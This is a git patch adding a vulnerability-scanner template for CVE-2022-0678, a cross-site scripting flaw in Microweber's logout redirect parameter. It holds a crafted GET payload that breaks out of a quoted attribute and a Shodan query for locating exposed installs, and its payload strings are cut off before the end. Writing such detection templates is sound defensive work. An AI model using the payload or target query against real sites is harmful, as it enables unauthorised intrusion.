From 227d22cfa3c58df3926e4c57f8d4d242534b42f5 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Wed, 14 Sep 2022 13:19:21 -0400 Subject: [PATCH 1/2] Create CVE-2022-0678.yaml --- cves/2022/CVE-2022-0678.yaml | 39 ++++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 cves/2022/CVE-2022-0678.yaml diff --git a/cves/2022/CVE-2022-0678.yaml b/cves/2022/CVE-2022-0678.yaml new file mode 100644 index 0000000000..aa809fe09e --- /dev/null +++ b/cves/2022/CVE-2022-0678.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-0678 + +info: + name: Microweber Cross-Site Scripting + author: tess + severity: medium + description: | + Can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out. + reference: + - https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0/ + - https://twitter.com/CVEnew/status/1495001503249178624?s=20&t=sfABvm7oG39Fd6rG44vQWg + - https://nvd.nist.gov/vuln/detail/CVE-2022-0678 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0678 + metadata: + verified: true + shodan-query: http.favicon.hash:780351152 + tags: xss,microweber + +requests: + - method: GET + path: + - '{{BaseURL}}/demo/api/logout?redirect_to=/asdf">' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '>